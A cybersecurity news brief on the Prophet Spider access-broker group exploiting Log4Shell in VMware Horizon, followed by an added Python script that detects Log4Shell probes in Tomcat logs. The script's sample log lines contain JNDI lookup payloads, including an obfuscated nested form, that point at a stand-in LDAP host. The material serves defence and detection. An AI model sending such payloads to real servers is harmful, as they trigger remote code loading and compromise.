Dive Brief:
- Threat researchers said attacks from an initial access broker (IAB) group called Prophet Spider coincide with the recently discovered Log4Shell vulnerability in VMware Horizon, according to Blackberry Research and Intelligence.
- Threat actors primarily installed cryptomining software onto affected systems, though in some cases they deployed Cobalt Strike beacons, according to Blackberry.
- Prophet Spider has a history of compromising networks and selling access to ransomware operators. It has similarities to the threat actor Zebra2104; however, the two groups are considered competitors and have no known connections to each other, according to Jim Simpson, Blackberry director of threat intelligence.
Dive Insight:
Threat researchers from Microsoft and other security providers previously disclosed efforts by initial access brokers to exploit the Log4j vulnerability, dubbed Log4Shell. Acting as middlemen, IABs typically gain access to a system and then sell that access to third-party threat actors, much like brokering access to a home that has already been broken into.
Log4j is found in hundreds of millions of devices worldwide and VMware Horizon is a widely used virtual desktop application. The widespread interest by IABs may indicate the long-term potential of exploiting the vulnerability, according to threat researchers.
"When an access broker group takes interest in a vulnerability whose scope is unknown, it's a good indication that attackers see significant value in its exploitation," said Tony Lee, VP of global service technical operations at Blackberry.
The Log4j vulnerability is considered so potentially dangerous because attackers can gain remote access to a compromised environment using just a few simple lines of code. Unlike with other high-profile vulnerabilities, attackers do not need sophisticated engineering backgrounds, nor do they need authenticated access.
Attacks on VMware Horizon exploit the Log4Shell vulnerability through the Apache Tomcat service embedded in VMware Horizon, according to NHS Digital, which first reported the exploitation earlier this month.
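As an added example (not from the article, NHS Digital or Blackberry's research), the following Python checks Tomcat-style access-log lines for the `${jndi:...}` lookup string that Log4Shell exploitation attempts carry. It first collapses nested `${lower:...}`, `${upper:...}` and `${...:-...}` lookups, which plain substring matching misses, before testing for `jndi:`. The log lines, IP addresses (from the documentation ranges) and URL paths are constructed for illustration.

```python
import re

# Constructed sample Tomcat access-log lines (not taken from the article).
# Lines 2 and 3 carry the lookup string that Log4Shell detection rules look for;
# line 3 uses the nested form that defeats a naive search for "${jndi:".
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [12/Jan/2022:10:01:12 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jan/2022:10:01:14 +0000] "GET /portal/info.jsp HTTP/1.1" 200 310 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [12/Jan/2022:10:01:15 +0000] "GET /portal/info.jsp HTTP/1.1" 200 310 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5/x}"',
    '198.51.100.11 - - [12/Jan/2022:10:02:03 +0000] "GET /healthcheck HTTP/1.1" 200 2 "-" "curl/7.68.0"',
]

# Matches an innermost ${...} lookup, i.e. one whose body contains no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match: "re.Match[str]") -> str:
    """Evaluate the text-transforming lookups Log4j supports; leave anything else inert."""
    body = match.group(1)
    if ":-" in body:
        # ${name:-literal} yields the literal when 'name' is not defined
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":
        return arg.lower()
    if sep and kind.lower() == "upper":
        return arg.upper()
    # Unresolvable lookup (jndi, env, sys, ...): drop the '$' so the loop terminates
    return "{" + body + "}"


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until none remain or the round limit is hit."""
    for _ in range(max_rounds):
        text, replaced = INNERMOST_LOOKUP.subn(_resolve, text)
        if replaced == 0:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line contains a lookup that resolves to a JNDI reference."""
    return "${" in line and "jndi:" in normalize_lookups(line).lower()


def flag_suspicious(lines: list[str]) -> list[str]:
    """Return the subset of log lines that warrant investigation."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for hit in flag_suspicious(SAMPLE_LOG_LINES):
        print("SUSPICIOUS:", hit)
```

Run against a real Tomcat access log, the same check belongs on every field an attacker controls (User-Agent, Referer, query string, custom headers), since Log4j interpolates lookups wherever the application logs untrusted input. A hit is a reason to inspect the host for follow-on activity such as cryptominer processes or Cobalt Strike beacons, not proof of compromise on its own.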
"The exploitation activity we have seen is recent," Lee said. "However, since we now have evidence that they have weaponized the exploit and payload delivery, we should expect to see more of the same."